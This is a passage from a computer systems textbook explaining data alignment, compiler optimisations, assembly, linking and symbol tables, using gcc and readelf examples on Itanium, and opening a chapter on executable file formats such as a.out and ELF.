One possible way to detect this sort of situation is profiling. When you profile your code you "watch" it
to analyse what code paths are taken and how long they take to execute. With profile guided optimisation
(PGO) the compiler can put special extra bits of code in the first binary it builds, which runs and makes a
record of the branches taken, etc. You can then recompile the binary with the extra information to possibly
create a better performing binary. Otherwise the programmer can look at the output of the profile and
possibly detect situations such as cache line bouncing. (XXX somewhere else?)
Space - Speed Trade off
What the compiler has done above is traded off using some extra memory to gain a speed improvement
in running our code. The compiler knows the rules of the architecture and can make decisions about the
best way to align data, possibly by trading off small amounts of wasted memory for increased (or perhaps
even just correct) performance.
Consequently as a programmer you should never make assumptions about the way variables and data will
be layed out by the compiler. To do so is not portable, as a different architecture may have different rules
and the compiler may make different decisions based on expicit commands or optimisation levels.
Making Assumptions
Thus, as a C programmer you need to be familiar with what you can assume about what the compiler will
do and what may be variable. What exactly you can assume and can not assume is detailed in the C99
standard; if you are programming in C it is certainly worth the investment in becoming familiar with the
rules to avoid writing non-portable or buggy code.
Example 7.2. Stack alignment example
  1 
                  $ cat stack.c
    #include <stdio.h>
    
  5 struct a_struct {
            int a;
            int b;
    };
    
 10 int main(void)
    {
            int i;
The Toolchain
118            struct a_struct s;
            printf("%p\n%p\ndiff %ld\n", &i, &s, (unsigned long)&s - (unsigned long)&i);
 15         return 0;
    }
    $ gcc-3.3 -Wall -o stack-3.3 ./stack.c
    $ gcc-4.0 -o stack-4.0 stack.c
    
 20 $ ./stack-3.3
    0x60000fffffc2b510
    0x60000fffffc2b520
    diff 16
    
 25 $ ./stack-4.0
    0x60000fffff89b520
    0x60000fffff89b524
    diff 4
    
 30             
In the example above, taken from an Itanium machine, we can see that the padding and aligment of the
stack has changed considerably between gcc versions. This type of thing is to be expected and must be
considered by the programmer.
Generally you should ensure that you do not make assumptions about the size of types or alignment rules.
C Idioms with alignment
There are a few common sequences of code that deal with alignment; generally most programs will
consider it in some ways. You may see these "code idioms" in many places outside the kernel when dealing
with programs that deal with chunks of data in some form or another, so it is worth investigating.
We can take some examples from the Linux kernel, which often has to deal with alignment of pages of
memory within the system.
Example 7.3. Page alignment manipulations
  1 
                  [ include/asm-ia64/page.h ]
    
    /*
  5  * PAGE_SHIFT determines the actual kernel page size.
     */
    #if defined(CONFIG_IA64_PAGE_SIZE_4KB)
    # define PAGE_SHIFT     12
    #elif defined(CONFIG_IA64_PAGE_SIZE_8KB)
 10 # define PAGE_SHIFT     13
    #elif defined(CONFIG_IA64_PAGE_SIZE_16KB)
    # define PAGE_SHIFT     14
    #elif defined(CONFIG_IA64_PAGE_SIZE_64KB)
    # define PAGE_SHIFT     16
 15 #else
    # error Unsupported page size!
    #endif
    
    #define PAGE_SIZE               (__IA64_UL_CONST(1) << PAGE_SHIFT)
The Toolchain
119 20 #define PAGE_MASK               (~(PAGE_SIZE - 1))
    #define PAGE_ALIGN(addr)        (((addr) + PAGE_SIZE - 1) & PAGE_MASK)
    
                
Above we can see that there are a number of different options for page sizes within the kernel, ranging
from 4KB through 64KB.
The PAGE_SIZE  macro is fairly self explanatory, giving the current page size selected within the system
by shifting a value of 1 by the shift number given (remember, this is the equivalent of saying 2n where
n is the PAGE_SHIFT ).
Next we have a definition for PAGE_MASK . The PAGE_MASK  allows us to find just those bits that are
within the current page, that is the offset of an address within its page.
XXX continue short discussion
Optimisation
Once the compiler has an internal representation of the code, the really interesting part of the compiler
starts. The compiler wants to find the most optimised assembly language output for the given input code.
This is a large and varied problem and requires knowledge of everything from efficient algorithms based
in computer science to deep knowledge about the particular processor the code is to be run on.
There are some common optimisations the compiler can look at when generating output. There are many,
many more strategies for generating the best code, and it is always an active research area.
General Optimising
The compiler can often see that a particular piece of code can not be used and so leave it out optimise a
particular language construct into something smaller with the same outcome.
Unrolling loops
If code contains a loop, such as a for or while loop and the compiler has some idea how many times it
will execute, it may be more efficient to unroll the loop so that it executes sequentially. This means that
instead of doing the inside of the loop and then branching back to the start to do repeat the process, the
inner loop code is duplicated to be executed again.
Whilst this increases the size of the code, it may allow the processor to work through the instructions more
efficiently as branches can cause inefficiencies in the pipeline of instructions coming into the processor.
Inlining functions
Similar to unrolling loops, it is possible to put embed called functions within the callee. The programmer
can specify that the compiler should try to do this by specifying the function as inline in the function
definition. Once again, you may trade code size for sequentiality in the code by doing this.
Branch Prediction
Any time the computer comes across an if statement there are two possible outcomes; true or false. The
processor wants to keep its incoming pipes as full as possible, so it can not wait for the outcome of the
test before putting code into the pipeline.
The Toolchain
120Thus the compiler can make a prediction about what way the test is likely to go. There are some simple
rules the compiler can use to guess things like this, for example if (val == -1)  is probably not likely
to be true, since -1 usually indicates an error code and hopefully that will not be triggered too often.
Some compilers can actually compile the program, have the user run it and take note of which way the
branches go under real conditions. It can then re-compile it based on what it has seen.
Assembler
The assembly code outputted by the compiler is still in a human readable form, should you know the
specifics of the assembly code for the processor. Developers will often take a peek at the assembly output
to manually check that the code is the most optimised or to discover any bugs in the compiler (this is more
common than one might think, especially when the compiler is being very aggressive with optimisations).
The assembler is a more mechanical process of converting the assembly code into a binary form.
Essentially, the assembler keeps a large table of each possible instruction and its binary counterpart (called
an op code for operation code). It combines these opcodes with the registers specified in the assembly to
produce a binary output file.
This code is called object code  and, at this stage, is not executable. Object code is simply a binary
representation of specific input source code file. Good programming practice dictates that a programmer
should not "put all the eggs in one basket" by placing all your source code in one file.
Linker
Often in a large program, you will separate out code into multiple files to keep related functions together.
Each of these files can be compiled into object code: but your final goal is to create a single executable!
There needs to be some way combining each of these object files into a single executable. We call this
linking.
Note that even if your program does fit in one file it still needs to be linked against certain system libraries
to operate correctly. For example, the printf call is kept in a library which must be combined with your
executable to work. So although you do not explicilty have to worry about linking in this case, there is
most certainly still a linking process happening to create your executable.
In the following sections we explain some terms essential to understanding linking.
Symbols
Symbols
Variables and functions all have names in source code which we refer to them by. One way of thinking
of a statement declaring a variable int a is that you are telling the compiler "set aside some memory of
sizeof(int)  and from now on when I use a it will refer to this allocated memory. Similarly a function
says "store this code in memory, and when I call function()  jump to and execute this code".
In this case, we call a and function  symbols since they are a symbolic representation of an area of
memory.
Symbols help humans to understand programming. You could say that the primary job of the compilation
process is to remove symbols -- the processor doesn't know what a represents, all it knows is that it has
The Toolchain
121some data at a particular memory address. The compilation process needs to convert a += 2 to something
like "increment the value in memory at 0xABCDE  by 2.
Symbol Visibility
In some C programs, you may have seen the terms static and extern used with variables. These
modifiers can effect what we call the visibility of symbols.
Imagine you have split up your program in two files, but some functions need to share a variable. You
only want one definition  (i.e. memory location) of the shared variable (otherwise it wouldn't be shared!),
but both files need to reference it.
To enable this, we declare the variable in one file, and then in the other file declare a variable of the same
name but with the prefix extern. extern stands for external and to a human means that this variable
is declared somewhere else.
What extern says to a compiler is that it should not allocate any space in memory for this variable, and
leave this symbol in the object code where it will be fixed up later. The compiler can not possibly know
where the symbol is actually defined but the linkerdoes, since it is it's job to look at all object files together
and combine them into a single executable. So the linker will see the symbol left over in the second file,
and say "I've seen that symbol before in file 1, and I know that it refers to memory location 0x12345 ".
Thus it can modify the symbol value to be the memory value of the variable in the first file.
static is almost the opposite of extern. It places restrictions on the visiblity of the symbol it modifies.
If you declare a variable with static that says to the compiler "don't leave any symbols for this in the
object code". This means that when the linker is linking together object files it will never see that symbol
(and so can't make that "I've seen this before!" connection). static is good for separation and reducing
conflicts -- by declaring a variable static you can reuse the variable name in other files and not end up
with symbol clashes. We say we are restricting the visiblity  of the symbol, because we are not allowing
the linker to see it. Contrast this with a more visible symbol (one not declared with static) which can
be seen by the linker.
The linking process
Thus the linking process is really two steps; combining all object files into one exectuable file and then
going through each object file to resolve any symbols. This usually requires two passes; one to read all
the symbol definitions and take note of unresolved symbols and a second to fix up all those unresolved
symbols to the right place.
The final executable should end up with no unresolved symbols; the linker will fail with an error if there
are any.2
A practical example
We can walk through the steps taken to build a simple application step by step.
Note that when you type gcc that actually runs a driver program that hides most of the steps from you.
Under normal circumstances this is exactly what you want, because the exact commands and options to
get a real life working executable on a real system can be quite complicated and architecture specific.
We will show the compliation process with the two following examples. Both are C source files, one
defined the main() function for the inital program entry point, and another declares a helper type function.
There is one global variable too, just for illustration.
2We call this static linking . Dynamic linking is a similar concept done at executable runtime, and is described a little later on.
The Toolchain
122Example 7.4. Hello World
  1 
                  #include <stdio.h>
    
    /* We need a prototype so the compiler knows what types function() takes */
  5 int function(char *input);
    
    /* Since this is static, we can define it in both hello.c and function.c */
    static int i = 100;
    
 10 /* This is a global variable */
    int global = 10;
    
    int main(void)
    {
 15  /* function() should return the value of global */
     int ret = function("Hello, World!");
     exit(ret);
    }
    
 20             
Example 7.5. Function Example
  1 
                  #include <stdio.h>
    
    static int i = 100;
  5 
    /* Declard as extern since defined in hello.c */
    extern int global;
    
    int function(char *input)
 10 {
     printf("%s\n", input);
     return global;
    }
    
 15             
Compiling
All compilers have an option to only execute the first step of compilation. Usually this is something like -S
and the output will generally be put into a file with the same name as the input file but with a .s extension.
Thus we can show the first step with gcc -S as illustrated in the example below.
Example 7.6. Compilation Example
  1 
                  ianw@lime:~/programs/csbu/wk7/code$ gcc -S hello.c
    ianw@lime:~/programs/csbu/wk7/code$ gcc -S function.c
The Toolchain
123    ianw@lime:~/programs/csbu/wk7/code$ cat function.s
  5         .file   "function.c"
            .pred.safe_across_calls p1-p5,p16-p63
            .section        .sdata,"aw",@progbits
            .align 4
            .type   i#, @object
 10         .size   i#, 4
    i:
            data4   100
            .section        .rodata
            .align 8
 15 .LC0:
            stringz "%s\n"
            .text
            .align 16
            .global function#
 20         .proc function#
    function:
            .prologue 14, 33
            .save ar.pfs, r34
            alloc r34 = ar.pfs, 1, 4, 2, 0
 25         .vframe r35
            mov r35 = r12
            adds r12 = -16, r12
            mov r36 = r1
            .save rp, r33
 30         mov r33 = b0
            .body
            ;;
            st8 [r35] = r32
            addl r14 = @ltoffx(.LC0), r1
 35         ;;
            ld8.mov r37 = [r14], .LC0
            ld8 r38 = [r35]
            br.call.sptk.many b0 = printf#
            mov r1 = r36
 40         ;;
            addl r15 = @ltoffx(global#), r1
            ;;
            ld8.mov r14 = [r15], global#
            ;;
 45         ld4 r14 = [r14]
            ;;
            mov r8 = r14
            mov ar.pfs = r34
            mov b0 = r33
 50         .restore sp
            mov r12 = r35
            br.ret.sptk.many b0
            ;;
            .endp function#
 55         .ident  "GCC: (GNU) 3.3.5 (Debian 1:3.3.5-11)"
    
                
The Toolchain
124The assembly is a little to complex to fully describe, but you should be able to see where i is defined as
a data4 (i.e. 4 bytes or 32 bits, the size of an int), where function  is defined ( function: ) and
a call to printf() .
We now have two assembly files ready to be assembled into machine code!
Assembly
Assembly is a fairly straight forward process. The assembler is usually called as and takes arguments in
a similar fasion to gcc
Example 7.7. Assembly Example
  1 
                  ianw@lime:~/programs/csbu/wk7/code$ as -o function.o function.s
    ianw@lime:~/programs/csbu/wk7/code$ as -o hello.o hello.s
    ianw@lime:~/programs/csbu/wk7/code$ ls
  5 function.c  function.o  function.s  hello.c  hello.o  hello.s
    
                
After assembling we have object code, which is ready to be linked together into the final executable. You
can usually skip having to use the assembler by hand by calling the compiler with -c, which will directly
convert the input file to object code, putting it in a file with the same prefix but .o as an extension.
We can't inspect the object code directly, as it is in a binary format (in future weeks we will learn about
this binary format). However we can use some tools to inspect the object files, for example readelf --
symbols  will show us symbols in the object file.
Example 7.8. Readelf Example
  1 
                  ianw@lime:~/programs/csbu/wk7/code$ readelf --symbols ./hello.o
    
    Symbol table '.symtab' contains 15 entries:
  5    Num:    Value          Size Type    Bind   Vis      Ndx Name
         0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
         1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS hello.c
         2: 0000000000000000     0 SECTION LOCAL  DEFAULT    1
         3: 0000000000000000     0 SECTION LOCAL  DEFAULT    3
 10      4: 0000000000000000     0 SECTION LOCAL  DEFAULT    4
         5: 0000000000000000     0 SECTION LOCAL  DEFAULT    5
         6: 0000000000000000     4 OBJECT  LOCAL  DEFAULT    5 i
         7: 0000000000000000     0 SECTION LOCAL  DEFAULT    6
         8: 0000000000000000     0 SECTION LOCAL  DEFAULT    7
 15      9: 0000000000000000     0 SECTION LOCAL  DEFAULT    8
        10: 0000000000000000     0 SECTION LOCAL  DEFAULT   10
        11: 0000000000000004     4 OBJECT  GLOBAL DEFAULT    5 global
        12: 0000000000000000    96 FUNC    GLOBAL DEFAULT    1 main
        13: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND function
 20     14: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND exit
    
    ianw@lime:~/programs/csbu/wk7/code$ readelf --symbols ./function.o
    
The Toolchain
125    Symbol table '.symtab' contains 14 entries:
 25    Num:    Value          Size Type    Bind   Vis      Ndx Name
         0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
         1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS function.c
         2: 0000000000000000     0 SECTION LOCAL  DEFAULT    1
         3: 0000000000000000     0 SECTION LOCAL  DEFAULT    3
 30      4: 0000000000000000     0 SECTION LOCAL  DEFAULT    4
         5: 0000000000000000     0 SECTION LOCAL  DEFAULT    5
         6: 0000000000000000     4 OBJECT  LOCAL  DEFAULT    5 i
         7: 0000000000000000     0 SECTION LOCAL  DEFAULT    6
         8: 0000000000000000     0 SECTION LOCAL  DEFAULT    7
 35      9: 0000000000000000     0 SECTION LOCAL  DEFAULT    8
        10: 0000000000000000     0 SECTION LOCAL  DEFAULT   10
        11: 0000000000000000   128 FUNC    GLOBAL DEFAULT    1 function
        12: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND printf
        13: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND global
 40 
                
Although the output is quite complicated (again!) you should be able to understand much of it. For example
•In the output of hello.o  have a look at the symbol with name i. Notice how it says it is LOCAL? That
is because we declared it static and as such it has been flagged as being local to this object file.
•In the same output, notice that the global variable is defined as a GLOBAL, meaning that it is visible
outside this file. Similarly the main() function is externally visable.
•Notice that the function  symbol (for the call to function()  is left has UND or undefined . This
means that it has been left for the linker to find the address of the function.
•Have a look at the symbols in the function.c  file and how they fit into the output.
Linking
Actually invoking the linker, called ld, is a very complicated process on a real system (are you sick of
hearing this yet?). This is why we leave the linking process up to gcc.
But of course we can spy on what gcc is doing under the hood with the -v (verbose) flag.
Example 7.9. Linking Example
  1 
                   /usr/lib/gcc-lib/ia64-linux/3.3.5/collect2 -static 
    /usr/lib/gcc-lib/ia64-linux/3.3.5/../../../crt1.o 
    /usr/lib/gcc-lib/ia64-linux/3.3.5/../../../crti.o 
  5 /usr/lib/gcc-lib/ia64-linux/3.3.5/crtbegin.o 
    -L/usr/lib/gcc-lib/ia64-linux/3.3.5 
    -L/usr/lib/gcc-lib/ia64-linux/3.3.5/../../.. 
    hello.o 
    function.o 
 10 --start-group 
    -lgcc 
    -lgcc_eh 
    -lunwind 
    -lc 
The Toolchain
126 15 --end-group 
    /usr/lib/gcc-lib/ia64-linux/3.3.5/crtend.o 
    /usr/lib/gcc-lib/ia64-linux/3.3.5/../../../crtn.o
    
                
The first thing you notice is that a program called collect2 is being called. This is a simple wrapper around
ld that is used internally by gcc.
The next thing you notice is object files starting with crt being specified to the linker. These functions
are provided by gcc and the system libraries and contain code required to start the program. In actuality,
the main() function is not the first one called when a program runs, but a function called _start which
is in the crt object files. This function does some generic setup which application programmers do not
need to worry about.
The path heirarchy is quite complicated, but in essence we can see that the final step is to link in some
extra object files, namely
•crt1.o : provided by the system libraries (libc) this object file contains the _start function which
is actually the first thing called within the program.
crti.o : provided by the system libraries
crtbegin.o
crtsaveres.o
crtend.o
crtn.o
We discuss how these are used to start the program a little later.
Next you can see that we link in our two object files, hello.o  and function.o . After that we specify
some extra libraries with -l flags. These libraries are system specific and required for every program. The
major one is -lc which brings in the C library, which has all common functions like printf() .
After that we again link in some more system object files which do some cleanup after programs exit.
Although the details are complicated, the concept is straight forward. All the object files will be linked
together into a single executable file, ready to run!
The Executable
We will go into more details about the executable in the short future, but we can do some inspection in a
similar fashion to the object files to see what has happened.
Example 7.10. Executable Example
  1 
                  ianw@lime:~/programs/csbu/wk7/code$ gcc -o program hello.c function.c
    ianw@lime:~/programs/csbu/wk7/code$ readelf --symbols ./program
    
  5 Symbol table '.dynsym' contains 11 entries:
       Num:    Value          Size Type    Bind   Vis      Ndx Name
         0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
The Toolchain
127         1: 6000000000000de0     0 OBJECT  GLOBAL DEFAULT  ABS _DYNAMIC
         2: 0000000000000000   176 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.2 (2)
 10      3: 600000000000109c     0 NOTYPE  GLOBAL DEFAULT  ABS __bss_start
         4: 0000000000000000   704 FUNC    GLOBAL DEFAULT  UND exit@GLIBC_2.2 (2)
         5: 600000000000109c     0 NOTYPE  GLOBAL DEFAULT  ABS _edata
         6: 6000000000000fe8     0 OBJECT  GLOBAL DEFAULT  ABS _GLOBAL_OFFSET_TABLE_     7: 60000000000010b0     0 NOTYPE  GLOBAL DEFAULT  ABS _end
         8: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _Jv_RegisterClasses
 15      9: 0000000000000000   544 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.2 (2)
        10: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
    
    Symbol table '.symtab' contains 127 entries:
       Num:    Value          Size Type    Bind   Vis      Ndx Name
 20      0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
         1: 40000000000001c8     0 SECTION LOCAL  DEFAULT    1
         2: 40000000000001e0     0 SECTION LOCAL  DEFAULT    2
         3: 4000000000000200     0 SECTION LOCAL  DEFAULT    3
         4: 4000000000000240     0 SECTION LOCAL  DEFAULT    4
 25      5: 4000000000000348     0 SECTION LOCAL  DEFAULT    5
         6: 40000000000003d8     0 SECTION LOCAL  DEFAULT    6
         7: 40000000000003f0     0 SECTION LOCAL  DEFAULT    7
         8: 4000000000000410     0 SECTION LOCAL  DEFAULT    8
         9: 4000000000000440     0 SECTION LOCAL  DEFAULT    9
 30     10: 40000000000004a0     0 SECTION LOCAL  DEFAULT   10
        11: 40000000000004e0     0 SECTION LOCAL  DEFAULT   11
        12: 40000000000005e0     0 SECTION LOCAL  DEFAULT   12
        13: 4000000000000b00     0 SECTION LOCAL  DEFAULT   13
        14: 4000000000000b40     0 SECTION LOCAL  DEFAULT   14
 35     15: 4000000000000b60     0 SECTION LOCAL  DEFAULT   15
        16: 4000000000000bd0     0 SECTION LOCAL  DEFAULT   16
        17: 4000000000000ce0     0 SECTION LOCAL  DEFAULT   17
        18: 6000000000000db8     0 SECTION LOCAL  DEFAULT   18
        19: 6000000000000dd0     0 SECTION LOCAL  DEFAULT   19
 40     20: 6000000000000dd8     0 SECTION LOCAL  DEFAULT   20
        21: 6000000000000de0     0 SECTION LOCAL  DEFAULT   21
        22: 6000000000000fc0     0 SECTION LOCAL  DEFAULT   22
        23: 6000000000000fd0     0 SECTION LOCAL  DEFAULT   23
        24: 6000000000000fe0     0 SECTION LOCAL  DEFAULT   24
 45     25: 6000000000000fe8     0 SECTION LOCAL  DEFAULT   25
        26: 6000000000001040     0 SECTION LOCAL  DEFAULT   26
        27: 6000000000001080     0 SECTION LOCAL  DEFAULT   27
        28: 60000000000010a0     0 SECTION LOCAL  DEFAULT   28
        29: 60000000000010a8     0 SECTION LOCAL  DEFAULT   29
 50     30: 0000000000000000     0 SECTION LOCAL  DEFAULT   30
        31: 0000000000000000     0 SECTION LOCAL  DEFAULT   31
        32: 0000000000000000     0 SECTION LOCAL  DEFAULT   32
        33: 0000000000000000     0 SECTION LOCAL  DEFAULT   33
        34: 0000000000000000     0 SECTION LOCAL  DEFAULT   34
 55     35: 0000000000000000     0 SECTION LOCAL  DEFAULT   35
        36: 0000000000000000     0 SECTION LOCAL  DEFAULT   36
        37: 0000000000000000     0 SECTION LOCAL  DEFAULT   37
        38: 0000000000000000     0 SECTION LOCAL  DEFAULT   38
        39: 0000000000000000     0 SECTION LOCAL  DEFAULT   39
 60     40: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        41: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
The Toolchain
128        42: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        43: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        44: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
 65     45: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        46: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        47: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        48: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        49: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <built-in>
 70     50: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS abi-note.S
        51: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        52: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS abi-note.S
        53: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        54: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS abi-note.S
 75     55: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        56: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        57: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        58: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <built-in>
        59: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS abi-note.S
 80     60: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS init.c
        61: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        62: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        63: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS initfini.c
        64: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
 85     65: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        66: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        67: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        68: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <built-in>
        69: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
 90     70: 4000000000000670   128 FUNC    LOCAL  DEFAULT   12 gmon_initializer
        71: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        72: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        73: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS initfini.c
        74: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
 95     75: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        76: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
        77: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        78: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <built-in>
        79: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS /build/buildd/glibc-2.3.2
100     80: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS auto-host.h
        81: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
        82: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <built-in>
        83: 6000000000000fc0     0 NOTYPE  LOCAL  DEFAULT   22 __CTOR_LIST__
        84: 6000000000000fd0     0 NOTYPE  LOCAL  DEFAULT   23 __DTOR_LIST__
105     85: 6000000000000fe0     0 NOTYPE  LOCAL  DEFAULT   24 __JCR_LIST__
        86: 6000000000001088     8 OBJECT  LOCAL  DEFAULT   27 dtor_ptr
        87: 40000000000006f0   128 FUNC    LOCAL  DEFAULT   12 __do_global_dtors_aux    
        88: 4000000000000770   128 FUNC    LOCAL  DEFAULT   12 __do_jv_register_classes
        89: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS hello.c
110     90: 6000000000001090     4 OBJECT  LOCAL  DEFAULT   27 i
        91: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS function.c
        92: 6000000000001098     4 OBJECT  LOCAL  DEFAULT   27 i
        93: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS auto-host.h
        94: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <command line>
115     95: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS <built-in>
The Toolchain
129        96: 6000000000000fc8     0 NOTYPE  LOCAL  DEFAULT   22 __CTOR_END__
        97: 6000000000000fd8     0 NOTYPE  LOCAL  DEFAULT   23 __DTOR_END__
        98: 6000000000000fe0     0 NOTYPE  LOCAL  DEFAULT   24 __JCR_END__
        99: 6000000000000de0     0 OBJECT  GLOBAL DEFAULT  ABS _DYNAMIC
120    100: 4000000000000a70   144 FUNC    GLOBAL HIDDEN   12 __do_global_ctors_aux
       101: 6000000000000dd8     0 NOTYPE  GLOBAL DEFAULT  ABS __fini_array_end
       102: 60000000000010a8     8 OBJECT  GLOBAL HIDDEN   29 __dso_handle
       103: 40000000000009a0   208 FUNC    GLOBAL DEFAULT   12 __libc_csu_fini
       104: 0000000000000000   176 FUNC    GLOBAL DEFAULT  UND printf@@GLIBC_2.2
125    105: 40000000000004a0    32 FUNC    GLOBAL DEFAULT   10 _init
       106: 4000000000000850   128 FUNC    GLOBAL DEFAULT   12 function
       107: 40000000000005e0   144 FUNC    GLOBAL DEFAULT   12 _start
       108: 6000000000001094     4 OBJECT  GLOBAL DEFAULT   27 global
       109: 6000000000000dd0     0 NOTYPE  GLOBAL DEFAULT  ABS __fini_array_start
130    110: 40000000000008d0   208 FUNC    GLOBAL DEFAULT   12 __libc_csu_init
       111: 600000000000109c     0 NOTYPE  GLOBAL DEFAULT  ABS __bss_start
       112: 40000000000007f0    96 FUNC    GLOBAL DEFAULT   12 main
       113: 6000000000000dd0     0 NOTYPE  GLOBAL DEFAULT  ABS __init_array_end
       114: 6000000000000dd8     0 NOTYPE  WEAK   DEFAULT   20 data_start
135    115: 4000000000000b00    32 FUNC    GLOBAL DEFAULT   13 _fini
       116: 0000000000000000   704 FUNC    GLOBAL DEFAULT  UND exit@@GLIBC_2.2
       117: 600000000000109c     0 NOTYPE  GLOBAL DEFAULT  ABS _edata
       118: 6000000000000fe8     0 OBJECT  GLOBAL DEFAULT  ABS _GLOBAL_OFFSET_TABLE_   
       119: 60000000000010b0     0 NOTYPE  GLOBAL DEFAULT  ABS _end
140    120: 6000000000000db8     0 NOTYPE  GLOBAL DEFAULT  ABS __init_array_start
       121: 6000000000001080     4 OBJECT  GLOBAL DEFAULT   27 _IO_stdin_used
       122: 60000000000010a0     8 OBJECT  GLOBAL DEFAULT   28 __libc_ia64_register_back
       123: 6000000000000dd8     0 NOTYPE  GLOBAL DEFAULT   20 __data_start
       124: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _Jv_RegisterClasses
145    125: 0000000000000000   544 FUNC    GLOBAL DEFAULT  UND __libc_start_main@@GLIBC_
       126: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
    
                
Some things to note
•Note I built the executable the "easy" way!
•See there are two symbol tables; the dynsym and symtab ones. We explain how the dynsym symbols
work soon, but notice that some of them are versioned  with an @ symbol.
•Note the many symbols that have been included from the extra object files. Many of them start with __
to avoid clashing with any names the programmer might choose. Read through and pick out the symbols
we mentioned before from the object files and see if they have changed in any way.
130Chapter 8. Behind the process
Review of executable files
We know that a program running in memory has two major components in code (also commonly known
as a text for historical reasons) and data. We also know, however, an executable does not live its life in
memory, but spends most of its life as a file on a disk. This file is in what is referred to as a binary format,
since the bits and bytes of the file are to be interpreted directly by processor hardware.
Representing executable files
Three Standard Sections
Any executable file format will need to specify where the code and data are in the binary file.
One additional component we have not mentioned until now is storage space of uninitialised global
variables. If we declare a variable and give it an initial value this obviously needs to be stored in the
executable file so that upon execution the value is correct. However many variables are uninitialised (or
zero) when the program is first executed. Making space for these in the executable and then simply storing
zero or NULL values in it is a waste of space, needlessly bloating the executable file size. Thus each
executable file can define a BSS section which simply gives a size for the uninitialised data; on program
load the extra memory can be allocated (and set to zero!).1
Binary Format
The executable is created by the toolchain from the source code. This file needs to be in a format explicitly
defined such that the compiler can create it and the operating system can identify it and load into memory,
turning it into a running process that the operating system can manage. This executable file format  can be
specific to the operating system, as we would not normally expect that a program compiled for one system
will execute on another (for example, you don't expect your Windows programs to run on Linux, or your
Linux programs to run on OS X).
However, the common thread between all executable file formats is that they include a predefined,
standardised header which describes how program code and data are stored in the rest of the file. In words,
it would generally describe "the program code starts 20 bytes into this file, and is 50 kilobytes long. The
program data follows it and is 20 kilobytes long".
In recent times one particular format has become the defacto standard for executable representation for
modern UNIX type systems. It is called the Executable and Linker Format , or ELF for short;
we'll be looking at it in more detail soon.
Binary Format History
a.out
ELF was not always the standard; original UNIX systems used a file format called a.out. We can see
the vestiges of this if you compile a program without the -o option to specify an output file name; the
executable will be created with a default name of a.out2.
1BSS probably stands for Block Started by Symbol, an assembly command for a old IBM computer.
2In fact, a.out is the default output filename from the linker. The compiler generally uses randomly generated file names as intermediate files
for assembly and object code.
